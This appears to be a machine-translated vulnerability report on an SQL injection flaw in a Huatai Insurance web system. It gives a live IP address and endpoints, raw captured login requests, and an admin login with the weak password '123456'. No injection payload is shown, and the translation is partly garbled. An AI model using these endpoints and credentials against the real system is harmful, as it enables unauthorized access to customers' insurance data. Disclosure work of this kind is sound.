An SQL injection vulnerability exists in a system of huatai insurance (supporting UNION involving millions of data)
SQL Injection Vulnerability (supporting UNION and millions of data records). Check whether the SQL injection vulnerability is 20 rank.
Huatai insurance integrated out-of-order system
Http: // 202.108.103.161: 9999/htcsp/
Capture packets when logging on
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getMac HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://202.108.103.161:9999/htcsp/Accept-Language: zh-cnUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Host: 202.108.103.161:9999Content-Length: 15Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52Ausername=system
Millions
10000 + users
All their passwords are weak.
The injection at logon is as follows:
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getBranch HTTP/1.1Host: 202.108.103.161:9999Connection: keep-aliveContent-Length: 15Accept: application/json, text/javascript, */*; q=0.01Origin: http://202.108.103.161:9999X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://202.108.103.161:9999/htcsp/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=68FEDD38D5B21C563F64CF28708CD04Cusername=admin
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcom HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcomAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Content-Type: application/x-www-form-urlencodedUA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveContent-Length: 72Host: 202.108.103.161:9999Pragma: no-cacheCookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52Ausername=admin&password=123456&comcode=&yanzhengma=EW84&yanzhengTrue=false
In fact, the packages are similar, just a few more parameters.
Solution:
Everything goes without saying anything